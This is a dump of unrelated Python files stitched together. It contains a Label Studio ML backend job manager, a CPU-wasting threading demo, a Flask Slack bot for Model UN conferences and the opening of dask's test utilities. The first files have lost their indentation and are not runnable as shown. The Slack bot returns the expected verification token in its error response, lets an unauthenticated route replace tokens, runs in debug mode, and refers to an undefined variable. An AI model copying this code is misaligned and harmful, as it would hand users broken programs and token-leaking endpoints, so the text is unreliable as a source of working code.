return reversed(sorted(map(int, filter(lambda d: d.isdigit(), os.listdir(self.model_dir)))))
def post_process(self, event, data, job_id, result):
if isinstance(result, dict):
result_file = os.path.join(self._job_dir(job_id), self.JOB_RESULT)
logger.debug(f'Saving job {job_id} result to file: {result_file}')
with open(result_file, mode='w') as f:
json.dump(result, f)
else:
logger.info(f'Cannot save result {result}')
def run_job(self, model_class, args: tuple):
proc = mp.Process(target=self.job, args=tuple([model_class] + list(args)))
proc.daemon = True
proc.start()
logger.info(f'Subprocess {proc.pid} has been started with args={args}')
class RQJobManager(JobManager):
"""
RQ-based Job Manager runs all background jobs in RQ workers and requires Redis server to be installed.
All job results are stored in and can be retrieved from the Redis queue.
"""
MAX_QUEUE_LEN = 1 # Controls the maximal number of simultaneous jobs in the queue.
# If exceeded, new jobs are ignored
def __init__(self, redis_host, redis_port, redis_queue):
self.redis_host = redis_host
self.redis_port = redis_port
self.redis_queue = redis_queue
def _get_redis(self, host, port, raise_on_error=False):
r = Redis(host=host, port=port)
try:
r.ping()
except redis.ConnectionError:
if raise_on_error:
raise
return None
else:
return r
@contextmanager
def start_run(self, event, data, job_id):
# Each "job" record in queue already encapsulates each run
yield
def run_job(self, model_class, args: tuple):
# Launch background job with RQ (production mode)
event, data, job_id = args
redis = self._get_redis(self.redis_host, self.redis_port)
queue = Queue(name=self.redis_queue, connection=redis)
if len(queue) >= self.MAX_QUEUE_LEN:
logger.warning(f'Maximal RQ queue len {self.MAX_QUEUE_LEN} reached. Job is not started.')
return
job = queue.enqueue(
self.job,
args=(model_class, event, data, job_id),
job_id=job_id,
job_timeout='365d',
ttl=None,
result_ttl=-1,
failure_ttl=300)
assert job.id == job_id
logger.info(f'RQ job {job_id} has been started for event={event}')
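# Hedged operational note: jobs enqueued here only execute once an RQ worker
# listens on this queue, e.g. started from a shell (assumed invocation):
#     rq worker <redis_queue> --url redis://<redis_host>:<redis_port>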
def _get_result_from_job_id(self, job_id):
redis = self._get_redis(self.redis_host, self.redis_port)
job = Job.fetch(job_id, connection=redis)
return job.result
def iter_finished_jobs(self):
redis = self._get_redis(self.redis_host, self.redis_port)
finished_jobs = FinishedJobRegistry(self.redis_queue, redis)
jobs = []
for job_id in finished_jobs.get_job_ids():
job = Job.fetch(job_id, connection=redis)
jobs.append((job_id, job.ended_at))
return (j[0] for j in reversed(sorted(jobs, key=lambda job: job[1])))
def post_process(self, event, data, job_id, result):
pass
class LabelStudioMLBase(ABC):
TRAIN_EVENTS = (
'ANNOTATION_CREATED',
'ANNOTATION_UPDATED',
'ANNOTATION_DELETED',
'PROJECT_UPDATED'
)
def __init__(self, label_config=None, train_output=None, **kwargs):
"""Model loader"""
self.label_config = label_config
self.parsed_label_config = parse_config(self.label_config) if self.label_config else {}
self.train_output = train_output or {}
self.hostname = kwargs.get('hostname', '')
self.access_token = kwargs.get('access_token', '')
@abstractmethod
def predict(self, tasks, **kwargs):
pass
def process_event(self, event, data, job_id, additional_params):
if event in self.TRAIN_EVENTS:
logger.debug(f'Job {job_id}: Received event={event}: calling {self.__class__.__name__}.fit()')
train_output = self.fit((), event=event, data=data, job_id=job_id, **additional_params)
logger.debug(f'Job {job_id}: Train finished.')
return train_output
def fit(self, tasks, workdir=None, **kwargs):
return {}
def get_local_path(self, url, project_dir=None):
return get_local_path(url, project_dir=project_dir, hostname=self.hostname, access_token=self.access_token)
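# --- Hedged usage sketch (illustrative, not part of the original module): a
# minimal backend built on the LabelStudioMLBase API above. The class name and
# the empty prediction shape are assumptions; a real backend builds result
# items matching its labeling configuration.
class _ExampleEmptyModel(LabelStudioMLBase):
    def predict(self, tasks, **kwargs):
        # One (empty) prediction per task.
        return [{'result': [], 'score': 0.0} for _ in tasks]
    def fit(self, tasks, workdir=None, **kwargs):
        # Whatever is returned here becomes 'train_output' for later runs.
        return {}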
class LabelStudioMLManager(object):
model_class = None
model_dir = None
redis_host = None
redis_port = None
redis_queue = None
train_kwargs = None
_redis = None
_redis_queue = None
_current_model = {}
@classmethod
def initialize(
cls, model_class, model_dir=None, redis_host='localhost', redis_port=6379, redis_queue='default',
**init_kwargs
):
if not issubclass(model_class, LabelStudioMLBase):
raise ValueError('Inference class should be a subclass of ' + LabelStudioMLBase.__name__)
cls.model_class = model_class
cls.redis_queue = redis_queue
cls.model_dir = model_dir
cls.init_kwargs = init_kwargs
cls.redis_host = redis_host
cls.redis_port = redis_port
if cls.model_dir:
cls.model_dir = os.path.expanduser(cls.model_dir)
os.makedirs(cls.model_dir, exist_ok=True)
cls._redis = None
if get_bool_env('USE_REDIS', False):
cls._redis = cls._get_redis(redis_host, redis_port)
if cls._redis:
cls._redis_queue = Queue(name=redis_queue, connection=cls._redis)
@classmethod
def get_initialization_params(cls):
return dict(
model_class=cls.model_class,
model_dir=cls.model_dir,
redis_host=cls.redis_host,
redis_port=cls.redis_port,
redis_queue=cls.redis_queue,
**cls.init_kwargs
)
@classmethod
def without_redis(cls):
return cls._redis is None
@classmethod
def _get_redis(cls, host, port, raise_on_error=False):
r = Redis(host=host, port=port)
try:
r.ping()
except redis.ConnectionError:
if raise_on_error:
raise
return None
else:
return r
@classmethod
def _generate_version(cls):
return str(int(datetime.now().timestamp()))
@classmethod
def _get_tasks_key(cls, project):
return 'project:' + str(project) + ':tasks'
@classmethod
def _get_job_results_key(cls, project):
return 'project:' + str(project) + ':job_results'
@classmethod
def _remove_jobs(cls, project):
started_registry = StartedJobRegistry(cls._redis_queue.name, cls._redis_queue.connection)
finished_registry = FinishedJobRegistry(cls._redis_queue.name, cls._redis_queue.connection)
for job_id in started_registry.get_job_ids() + finished_registry.get_job_ids():
job = Job.fetch(job_id, connection=cls._redis)
if job.meta.get('project') != project:
continue
logger.info('Deleting job_id ' + job_id)
job.delete()
@classmethod
def _get_latest_job_result_from_redis(cls, project):
job_results_key = cls._get_job_results_key(project)
try:
num_finished_jobs = cls._redis.llen(job_results_key)
if num_finished_jobs == 0:
logger.info('Job queue is empty')
return
latest_job = cls._redis.lindex(job_results_key, -1)
except redis.exceptions.ConnectionError as exc:
logger.error(exc)
return
else:
return json.loads(latest_job)
@classmethod
def _get_latest_job_result_from_workdir(cls, project):
project_model_dir = os.path.join(cls.model_dir, project or '')
if not os.path.exists(project_model_dir):
return
# sort directories by decreasing timestamps
for subdir in reversed(sorted(map(int, filter(lambda d: d.isdigit(), os.listdir(project_model_dir))))):
job_result_file = os.path.join(project_model_dir, str(subdir), 'job_result.json')
if not os.path.exists(job_result_file):
logger.error('The latest job result file ' + job_result_file + ' doesn\'t exist')
continue
with open(job_result_file) as f:
return json.load(f)
@classmethod
def _key(cls, project):
return project, os.getpid()
@classmethod
def has_active_model(cls, project):
return cls._key(project) in cls._current_model
@classmethod
def get(cls, project):
key = cls._key(project)
logger.debug('Get project ' + str(key))
return cls._current_model.get(key)
@classmethod
def create(cls, project=None, label_config=None, train_output=None, version=None, **kwargs):
key = cls._key(project)
logger.debug('Create project ' + str(key))
kwargs.update(cls.init_kwargs)
cls._current_model[key] = ModelWrapper(
model=cls.model_class(label_config=label_config, train_output=train_output, **kwargs),
model_version=version or cls._generate_version()
)
return cls._current_model[key]
@classmethod
def get_or_create(
cls, project=None, label_config=None, force_reload=False, train_output=None, version=None, **kwargs
):
# reload new model if model is not loaded into memory OR force_reload=True OR model versions are mismatched
if not cls.has_active_model(project) or force_reload or (cls.get(project).model_version != version and version is not None): # noqa
logger.debug('Reload model for project={project} with version={version}'.format(
project=project, version=version))
cls.create(project, label_config, train_output, version, **kwargs)
return cls.get(project)
@classmethod
def fetch(cls, project=None, label_config=None, force_reload=False, **kwargs):
if not os.getenv('LABEL_STUDIO_ML_BACKEND_V2', default=True):
# TODO: Deprecated branch
if cls.without_redis():
logger.debug('Fetch ' + project + ' from local directory')
job_result = cls._get_latest_job_result_from_workdir(project) or {}
else:
logger.debug('Fetch ' + project + ' from Redis')
job_result = cls._get_latest_job_result_from_redis(project) or {}
train_output = job_result.get('train_output')
version = job_result.get('version')
return cls.get_or_create(project, label_config, force_reload, train_output, version, **kwargs)
model_version = kwargs.get('model_version')
if not cls._current_model or model_version != cls._current_model.model_version:
jm = cls.get_job_manager()
model_version = kwargs.get('model_version')
job_result = jm.get_result(model_version)
if job_result:
logger.debug(f'Found job result: {job_result}')
model = cls.model_class(label_config=label_config, train_output=job_result, **kwargs)
cls._current_model = ModelWrapper(model=model, model_version=job_result['job_id'])
else:
logger.debug(f'Job result not found: create initial model')
model = cls.model_class(label_config=label_config, **kwargs)
cls._current_model = ModelWrapper(model=model, model_version='INITIAL')
return cls._current_model
@classmethod
def job_status(cls, job_id):
job = Job.fetch(job_id, connection=cls._redis)
response = {
'job_status': job.get_status(),
'error': job.exc_info,
'created_at': job.created_at,
'enqueued_at': job.enqueued_at,
'started_at': job.started_at,
'ended_at': job.ended_at
}
if job.is_finished and isinstance(job.result, str):
response['result'] = json.loads(job.result)
return response
@classmethod
def is_training(cls, project):
if not cls.has_active_model(project):
return {'is_training': False}
m = cls.get(project)
if cls.without_redis():
return {
'is_training': m.is_training,
'backend': 'none',
'model_version': m.model_version
}
else:
started_jobs = StartedJobRegistry(cls._redis_queue.name, cls._redis_queue.connection).get_job_ids()
finished_jobs = FinishedJobRegistry(cls._redis_queue.name, cls._redis_queue.connection).get_job_ids()
failed_jobs = FailedJobRegistry(cls._redis_queue.name, cls._redis_queue.connection).get_job_ids()
running_jobs = list(set(started_jobs) - set(finished_jobs + failed_jobs))
logger.debug('Running jobs: ' + str(running_jobs))
for job_id in running_jobs:
job = Job.fetch(job_id, connection=cls._redis)
if job.meta.get('project') == project:
return {
'is_training': True,
'job_id': job_id,
'backend': 'redis',
'model_version': m.model_version,
}
return {
'is_training': False,
'backend': 'redis',
'model_version': m.model_version
}
@classmethod
def predict(
cls, tasks, project=None, label_config=None, force_reload=False, try_fetch=True, **kwargs
):
if not os.getenv('LABEL_STUDIO_ML_BACKEND_V2', default=True):
if try_fetch:
m = cls.fetch(project, label_config, force_reload)
else:
m = cls.get(project)
if not m:
raise FileNotFoundError('No model loaded. Specify "try_fetch=True" option.')
predictions = m.model.predict(tasks, **kwargs)
return predictions, m
if not cls._current_model:
            raise ValueError(f'Model is not loaded for {cls.__name__}: run setup() before using predict()')
predictions = cls._current_model.model.predict(tasks, **kwargs)
return predictions, cls._current_model
@classmethod
def create_data_snapshot(cls, data_iter, workdir):
data = list(data_iter)
data_file = os.path.join(workdir, 'train_data.json')
with io.open(data_file, mode='w') as fout:
json.dump(data, fout, ensure_ascii=False)
info_file = os.path.join(workdir, 'train_data_info.json')
with io.open(info_file, mode='w') as fout:
json.dump({'count': len(data)}, fout)
@classmethod
def train_script_wrapper(
cls, project, label_config, train_kwargs, initialization_params=None, tasks=()
):
if initialization_params:
# Reinitialize new cls instance for using in RQ context
initialization_params = initialization_params or {}
cls.initialize(**initialization_params)
# fetching the latest model version before we generate the next one
t = time.time()
m = cls.fetch(project, label_config)
m.is_training = True
version = cls._generate_version()
if cls.model_dir:
logger.debug('Running in model dir: ' + cls.model_dir)
project_model_dir = os.path.join(cls.model_dir, project or '')
workdir = os.path.join(project_model_dir, version)
os.makedirs(workdir, exist_ok=True)
else:
logger.debug('Running without model dir')
workdir = None
if cls.without_redis():
data_stream = tasks
else:
data_stream = (json.loads(t) for t in cls._redis.lrange(cls._get_tasks_key(project), 0, -1))
if workdir:
data_stream, snapshot = tee(data_stream)
cls.create_data_snapshot(snapshot, workdir)
try:
train_output = m.model.fit(data_stream, workdir, **train_kwargs)
if cls.without_redis():
job_id = None
else:
job_id = get_current_job().id
job_result = json.dumps({
'status': 'ok',
'train_output': train_output,
'project': project,
'workdir': workdir,
'version': version,
'job_id': job_id,
'time': time.time() - t
})
if workdir:
job_result_file = os.path.join(workdir, 'job_result.json')
with open(job_result_file, mode='w') as fout:
fout.write(job_result)
if not cls.without_redis():
cls._redis.rpush(cls._get_job_results_key(project), job_result)
except:
raise
finally:
m.is_training = False
return job_result
@classmethod
def _start_training_job(cls, project, label_config, train_kwargs):
job = cls._redis_queue.enqueue(
cls.train_script_wrapper,
args=(project, label_config, train_kwargs, cls.get_initialization_params()),
job_timeout='365d',
ttl=None,
result_ttl=-1,
failure_ttl=300,
meta={'project': project},
)
logger.info('Training job {job} started for project {project}'.format(job=job, project=project))
return job
@classmethod
def train(cls, tasks, project=None, label_config=None, **kwargs):
job = None
if cls.without_redis():
job_result = cls.train_script_wrapper(
project, label_config, train_kwargs=kwargs, tasks=tasks)
train_output = json.loads(job_result)['train_output']
cls.get_or_create(project, label_config, force_reload=True, train_output=train_output)
else:
tasks_key = cls._get_tasks_key(project)
cls._redis.delete(tasks_key)
for task in tasks:
cls._redis.rpush(tasks_key, json.dumps(task))
job = cls._start_training_job(project, label_config, kwargs)
return job
@classmethod
def get_job_manager(cls):
if cls.without_redis():
# Launch background job with fork (dev mode)
job_man = SimpleJobManager(model_dir=cls.model_dir)
else:
# Launch background job with RQ (production mode)
job_man = RQJobManager(redis_host=cls.redis_host, redis_port=cls.redis_port, redis_queue=cls.redis_queue)
return job_man
@classmethod
def webhook(cls, event, data):
job_id = cls._generate_version()
cls.get_job_manager().run_job(cls.model_class, (event, data, job_id))
return {'job_id': job_id}
def get_all_classes_inherited_LabelStudioMLBase(script_file):
names = set()
abs_path = os.path.abspath(script_file)
module_name = os.path.splitext(os.path.basename(script_file))[0]
sys.path.append(os.path.dirname(abs_path))
try:
module = importlib.import_module(module_name)
except ModuleNotFoundError as e:
print(Fore.RED + 'Can\'t import module "' + module_name + f'", reason: {e}.\n'
'If you are looking for examples, you can find a dummy model.py here:\n' +
Fore.LIGHTYELLOW_EX + 'https://labelstud.io/tutorials/dummy_model.html')
module = None
exit(-1)
for name, obj in inspect.getmembers(module, inspect.isclass):
if name == LabelStudioMLBase.__name__:
continue
if issubclass(obj, LabelStudioMLBase):
names.add(name)
for base in obj.__bases__:
if LabelStudioMLBase.__name__ == base.__name__:
names.add(name)
sys.path.pop()
return list(names)
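# Illustrative usage (a sketch, not part of the original module): discover the
# model classes defined in a user script. "my_model.py" is a hypothetical file
# containing a LabelStudioMLBase subclass.
if __name__ == '__main__':
    detected = get_all_classes_inherited_LabelStudioMLBase('my_model.py')
    print('Detected model classes:', detected)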
|
parallel_programming_1.py
|
#!/usr/bin/env python3
""" Code for https://www.linkedin.com/learning/python-parallel-and-concurrent-programming-part-1/multiple-threads-python-demo?u=26192810 """
import os
import threading
""" C20: 演示一个简单的 thread 例子, 显示 pid, threading.active_count() 和返回 Thread 对象列表
"""
class C2_0:
# a simple function that wastes CPU cycles forever
@staticmethod
def cpu_waster():
while True:
pass
@staticmethod
def start_n_waster_thread(n=12):
print(f'\nStarting {n} CPU Wasters...')
for i in range(n):
threading.Thread(target=C2_0.cpu_waster).start()
@staticmethod
def display_mp_thread_info():
        print('\n Process ID: ', os.getpid())  # os.getpid() gives the current process ID
        print('Thread Count: ', threading.active_count())
        for thread in threading.enumerate():  # list of currently active Thread objects
print(thread)
@staticmethod
def call_thread():
C2_0.display_mp_thread_info() # 1. display information about this process
C2_0.start_n_waster_thread(12) # 2. start 12 CPU threads
C2_0.display_mp_thread_info() # 3. display information about this process
""" C2_1: 演示简单的 multiprocessing 例子
"""
import multiprocessing as mp
class C2_1:
@staticmethod
def start_n_waster_mp(n=12):
print(f'\nStarting {n} CPU Wasters...')
for i in range(n):
            mp.Process(target=C2_0.cpu_waster).start()  # start a process, analogous to starting a thread
@staticmethod
def call_mp():
C2_0.display_mp_thread_info()
C2_1.start_n_waster_mp(12)
C2_0.display_mp_thread_info()
if __name__ == '__main__':
# C2_0.call_thread()
C2_1.call_mp()
|
app.py
|
# -*- coding: utf-8 -*-
"""
A routing layer for the MUN bot built using
[Slack's Events API](https://api.slack.com/events-api) in Python
"""
import json
import bot
from flask import Flask, request, make_response, render_template
from threading import Thread
pyBot = bot.Bot()
slack = pyBot.client
app = Flask(__name__)
def _event_handler(event_type, slack_event):
"""
A helper function that routes events from Slack to our Bot
by event type and subtype.
Parameters
----------
event_type : str
        type of event received from Slack
slack_event : dict
JSON response from a Slack reaction event
Returns
----------
obj
Response object with 200 - ok or 500 - No Event Handler error
"""
team_id = slack_event["team_id"]
# ================ Team Join Events =============== #
# When the user first joins a team, the type of event will be team_join
if event_type == "team_join":
user_id = slack_event["event"]["user"]["id"]
# Send the onboarding message
pyBot.onboarding_message(team_id, user_id)
return make_response("Welcome Message Sent", 200,)
# ============== Share Message Events ============= #
# If the user has shared the onboarding message, the event type will be
# message. We'll also need to check that this is a message that has been
# shared by looking into the attachments for "is_shared".
elif event_type == "message" and slack_event["event"].get("attachments"):
user_id = slack_event["event"].get("user")
if slack_event["event"]["attachments"][0].get("is_share"):
# Update the onboarding message and check off "Share this Message"
pyBot.update_share(team_id, user_id)
return make_response("Welcome message updates with shared message",
200,)
# ============= Reaction Added Events ============= #
# If the user has added an emoji reaction to the onboarding message
elif event_type == "reaction_added":
user_id = slack_event["event"]["user"]
# Update the onboarding message
pyBot.update_emoji(team_id, user_id)
return make_response("Welcome message updates with reactji", 200,)
# =============== Pin Added Events ================ #
# If the user has added an emoji reaction to the onboarding message
elif event_type == "pin_added":
user_id = slack_event["event"]["user"]
# Update the onboarding message
pyBot.update_pin(team_id, user_id)
return make_response("Welcome message updates with pin", 200,)
    # ================ potty mouth detector ============ #
    # scans deleted messages for flagged words
elif event_type == "message.im":
if "message_deleted" in slack_event["event"]["subtype"]:
message = slack_event["event"]["text"]
message_set = set(message.split(' '))
if not message_set.isdisjoint(bad_words):
bad_message = {}
bad_message["user"] = slack_event["event"]["user"]
bad_message["message"] = message
bad_message["channel"] = slack_event["channel"]
bad_message["time"] = slack_event["ts"]
#alert committee staff
#alert Secretariat
#alert advisor(s)
return make_response("bad message", 200,)
return make_response("good message", 200,)
# ============= Event Type Not Found! ============= #
# If the event_type does not have a handler
message = "You have not added an event handler for the %s" % event_type
# Return a helpful error message
return make_response(message, 200, {"X-Slack-No-Retry": 1})
@app.route("/install", methods=["GET"])
def pre_install():
"""This route renders the installation page with 'Add to Slack' button."""
# Since we've set the client ID and scope on our Bot object, we can change
# them more easily while we're developing our app.
client_id = pyBot.oauth["client_id"]
scope = pyBot.oauth["scope"]
# Our template is using the Jinja templating language to dynamically pass
# our client id and scope
return render_template("install.html", client_id=client_id, scope=scope)
@app.route("/thanks", methods=["GET", "POST"])
def thanks():
"""
This route is called by Slack after the user installs our app. It will
exchange the temporary authorization code Slack sends for an OAuth token
which we'll save on the bot object to use later.
To let the user know what's happened it will also render a thank you page.
"""
# Let's grab that temporary authorization code Slack's sent us from
# the request's parameters.
code_arg = request.args.get('code')
    # The bot's auth method handles exchanging the code for an OAuth token
pyBot.auth(code_arg)
return render_template("thanks.html")
@app.route("/update", methods=["GET", "POST"])
def update():
"""
This route is called by Postman to initialize the Slack client with
our access token. Otherwise in development the token never gets updated
"""
token = request.args.get('token')
team_id = request.args.get('team_id')
pyBot.update_token(team_id, token)
return make_response("Token updated", 200, {"content_type":
"application/json"
})
@app.route("/init_conference", methods=["GET", "POST"])
def start_conference():
"""
This route is called by the slash command /init_conference for creating
an integrated conference object with multiple committees that may or may
not interact. This way there will be one slack team for the entire conference
"""
def make_conference(conference_info):
admin = {conference_info["user_id"]:conference_info["user_name"]}
conference = {conference_info["team_id"]:conference_info["text"]}
pyBot.create_conference(conference, admin, conference_info["response_url"] )
thread = Thread(target=make_conference, kwargs={'conference_info':request.form})
if len(request.form["text"]) > 3: # for minamum MUN
message = "conference " + request.form["text"] + " initializing"
thread.start()
else:
message = "please supply conference name[/init_conference [name]]"
return make_response(message, 200, {"content_type":"application/json"})
@app.route("/init_universe", methods=["GET", "POST"])
def start_universe():
"""
This route is called by the slash command /init_universe for creating
    a 'universe' in the conference (a stand-alone committee is one committee
    in one universe, an X-number-JCC is X committees in one universe).
    Must be called after a call to /init_conference
Slash commands send data as url-form-encoded which gets put into
request.form NOT request.data
"""
if not pyBot.conference:
#Conference has not been set
return make_response("conference not initialized", 200, {"content_type":
"plain text"})
universe_jcc = True
universe_info = request.form
print(universe_info)
payload = universe_info["text"]
if "jcc" in payload: universe_jcc = True
payload = payload.split(" ")
committee_list = set()
for word in payload:
if '<#' not in word and '#' in word:
word = word[1:21].lower()
ok ="_0123456789-abcdefghijklmnopqrstuvwxyz"
if all(c in ok for c in word):
committee_list.add(word)
if not universe_jcc:
committee_list.add({"name": universe_info["channel_name"],
"id": universe_info["channel_id"]})
    pyBot.create_universe(universe_info["channel_name"],
universe_info["channel_id"],
committee_list,
universe_jcc)
@app.route("/add_jcc", methods=["GET", "POST"])
def add_jcc():
""" have to include the #channel that is the
base of the jcc"""
    if not pyBot.conference:
#conference hasn't been initialized
return make_response("conference not initialized", 200, {"content_type":
"plain text"})
universe_id = None
committee_info = request.form
payload = committee_info["text"]
if "<#" in payload:
payload = payload.split("<#")
universe_id = payload[1].split(">")
else:
#channel not specified!
return make_response("channel not specified", 200, {"content_type":
"plain text"})
if universe_id:
        pyBot.add_universe_committee(universe_id,
committee_info["channel_name"],
committee_info["channel_id"])
else:
#could not parse universe_id
return make_response("could not find universe channel", 200, {"content_type":
"plain text"})
@app.route("/listening", methods=["GET", "POST"])
def hears():
"""
This route listens for incoming events from Slack and uses the event
handler helper function to route events to our Bot.
"""
slack_event = json.loads(request.data)
# ============= Slack URL Verification ============ #
# In order to verify the url of our endpoint, Slack will send a challenge
# token in a request and check for this token in the response our endpoint
    # sends back.
# For more info: https://api.slack.com/events/url_verification
if "challenge" in slack_event:
return make_response(slack_event["challenge"], 200, {"content_type":
"application/json"
})
# ============ Slack Token Verification =========== #
# We can verify the request is coming from Slack by checking that the
# verification token in the request matches our app's settings
if pyBot.verification != slack_event.get("token"):
message = "Invalid Slack verification token: %s \npyBot has: \
%s\n\n" % (slack_event["token"], pyBot.verification)
# By adding "X-Slack-No-Retry" : 1 to our response headers, we turn off
# Slack's automatic retries during development.
        return make_response(message, 403, {"X-Slack-No-Retry": 1})
# ====== Process Incoming Events from Slack ======= #
    # If the incoming request is an Event we've subscribed to
if "event" in slack_event:
event_type = slack_event["event"]["type"]
# Then handle the event by event_type and have your bot respond
return _event_handler(event_type, slack_event)
# If our bot hears things that are not events we've subscribed to,
# send a quirky but helpful error response
return make_response("[NO EVENT IN SLACK REQUEST] These are not the droids\
you're looking for.", 404, {"X-Slack-No-Retry": 1})
if __name__ == '__main__':
app.run(debug=True, threaded=True)
|
utils_test.py
|
from __future__ import annotations
import asyncio
import concurrent.futures
import contextlib
import copy
import functools
import gc
import inspect
import io
import logging
import logging.config
import multiprocessing
import os
import re
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import weakref
from collections import defaultdict
from collections.abc import Callable
from contextlib import contextmanager, nullcontext, suppress
from itertools import count
from time import sleep
from typing import Any, Literal
from distributed.compatibility import MACOS
from distributed.scheduler import Scheduler
try:
import ssl
except ImportError:
ssl = None # type: ignore
import pytest
import yaml
from tlz import assoc, memoize, merge
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from distributed import system
from distributed import versions as version_module
from distributed.client import Client, _global_clients, default_client
from distributed.comm import Comm
from distributed.comm.tcp import TCP, BaseTCPConnector
from distributed.compatibility import WINDOWS
from distributed.config import initialize_logging
from distributed.core import CommClosedError, ConnectionPool, Status, connect, rpc
from distributed.deploy import SpecCluster
from distributed.diagnostics.plugin import WorkerPlugin
from distributed.metrics import time
from distributed.nanny import Nanny
from distributed.node import ServerNode
from distributed.proctitle import enable_proctitle_on_children
from distributed.security import Security
from distributed.utils import (
DequeHandler,
TimeoutError,
_offload_executor,
get_ip,
get_ipv6,
iscoroutinefunction,
log_errors,
mp_context,
reset_logger_locks,
sync,
)
from distributed.worker import Worker
try:
import dask.array # register config
except ImportError:
pass
logger = logging.getLogger(__name__)
logging_levels = {
name: logger.level
for name, logger in logging.root.manager.loggerDict.items()
if isinstance(logger, logging.Logger)
}
_TEST_TIMEOUT = 30
_offload_executor.submit(lambda: None).result() # create thread during import
@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("print('hello world!')")
return local_file
@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
lines = (
"from distributed import Client",
"e = Client('127.0.0.1:8989')",
"print(e)",
)
local_file.write("\n".join(lines))
return local_file
@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("a+1")
return local_file
async def cleanup_global_workers():
for worker in Worker._instances:
await worker.close(report=False, executor_wait=False)
@pytest.fixture
def loop():
with check_instances():
with pristine_loop() as loop:
# Monkey-patch IOLoop.start to wait for loop stop
orig_start = loop.start
is_stopped = threading.Event()
is_stopped.set()
def start():
is_stopped.clear()
try:
orig_start()
finally:
is_stopped.set()
loop.start = start
yield loop
# Stop the loop in case it's still running
try:
sync(loop, cleanup_global_workers, callback_timeout=0.500)
loop.add_callback(loop.stop)
except RuntimeError as e:
if not re.match("IOLoop is clos(ed|ing)", str(e)):
raise
except TimeoutError:
pass
else:
is_stopped.wait()
@pytest.fixture
def loop_in_thread():
with pristine_loop() as loop:
thread = threading.Thread(target=loop.start, name="test IOLoop")
thread.daemon = True
thread.start()
loop_started = threading.Event()
loop.add_callback(loop_started.set)
loop_started.wait()
yield loop
loop.add_callback(loop.stop)
thread.join(timeout=5)
@pytest.fixture
def zmq_ctx():
import zmq
ctx = zmq.Context.instance()
yield ctx
ctx.destroy(linger=0)
@contextmanager
def pristine_loop():
IOLoop.clear_instance()
IOLoop.clear_current()
loop = IOLoop()
loop.make_current()
assert IOLoop.current() is loop
try:
yield loop
finally:
try:
loop.close(all_fds=True)
except (KeyError, ValueError):
pass
IOLoop.clear_instance()
IOLoop.clear_current()
original_config = copy.deepcopy(dask.config.config)
def reset_config():
dask.config.config.clear()
dask.config.config.update(copy.deepcopy(original_config))
def nodebug(func):
"""
A decorator to disable debug facilities during timing-sensitive tests.
Warning: this doesn't affect already created IOLoops.
"""
@functools.wraps(func)
def wrapped(*args, **kwargs):
old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
try:
return func(*args, **kwargs)
finally:
if old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug
return wrapped
def nodebug_setup_module(module):
"""
A setup_module() that you can install in a test module to disable
debug facilities.
"""
module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if module._old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
def nodebug_teardown_module(module):
"""
A teardown_module() that you can install in a test module to reenable
debug facilities.
"""
if module._old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug
def inc(x):
return x + 1
def dec(x):
return x - 1
def mul(x, y):
return x * y
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise RuntimeError("hello!")
def double(x):
return x * 2
def slowinc(x, delay=0.02):
sleep(delay)
return x + 1
def slowdec(x, delay=0.02):
sleep(delay)
return x - 1
def slowdouble(x, delay=0.02):
sleep(delay)
return 2 * x
def randominc(x, scale=1):
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y, delay=0.02):
sleep(delay)
return x + y
def slowsum(seq, delay=0.02):
sleep(delay)
return sum(seq)
def slowidentity(*args, **kwargs):
delay = kwargs.get("delay", 0.02)
sleep(delay)
if len(args) == 1:
return args[0]
else:
return args
class _UnhashableCallable:
# FIXME https://github.com/python/mypy/issues/4266
__hash__ = None # type: ignore
def __call__(self, x):
return x + 1
def run_for(duration, timer=time):
"""
Burn CPU for *duration* seconds.
"""
deadline = timer() + duration
while timer() <= deadline:
pass
# This dict grows at every varying() invocation
_varying_dict: defaultdict[str, int] = defaultdict(int)
_varying_key_gen = count()
class _ModuleSlot:
def __init__(self, modname, slotname):
self.modname = modname
self.slotname = slotname
def get(self):
return getattr(sys.modules[self.modname], self.slotname)
def varying(items):
"""
Return a function that returns a result (or raises an exception)
from *items* at each call.
"""
# cloudpickle would serialize the *values* of all globals
# used by *func* below, so we can't use `global <something>`.
# Instead look up the module by name to get the original namespace
# and not a copy.
slot = _ModuleSlot(__name__, "_varying_dict")
key = next(_varying_key_gen)
def func():
dct = slot.get()
i = dct[key]
if i == len(items):
raise IndexError
else:
x = items[i]
dct[key] = i + 1
if isinstance(x, Exception):
raise x
else:
return x
return func
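# Illustrative usage of varying() (a sketch, not part of the original module):
# each call returns the next item, raising it if it is an exception instance.
#   f = varying([1, ZeroDivisionError("boom"), 3])
#   f()  # -> 1
#   f()  # raises ZeroDivisionError
#   f()  # -> 3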
def map_varying(itemslists):
"""
Like *varying*, but return the full specification for a map() call
on multiple items lists.
"""
def apply(func, *args, **kwargs):
return func(*args, **kwargs)
return apply, list(map(varying, itemslists))
async def geninc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
async def asyncinc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
_readone_queues: dict[Any, asyncio.Queue] = {}
async def readone(comm):
"""
Read one message at a time from a comm that reads lists of
messages.
"""
try:
q = _readone_queues[comm]
except KeyError:
q = _readone_queues[comm] = asyncio.Queue()
async def background_read():
while True:
try:
messages = await comm.read()
except CommClosedError:
break
for msg in messages:
q.put_nowait(msg)
q.put_nowait(None)
del _readone_queues[comm]
        asyncio.ensure_future(background_read())  # schedule the reader on the running loop
msg = await q.get()
if msg is None:
raise CommClosedError
else:
return msg
def run_scheduler(q, nputs, config, port=0, **kwargs):
with dask.config.set(config):
from distributed import Scheduler
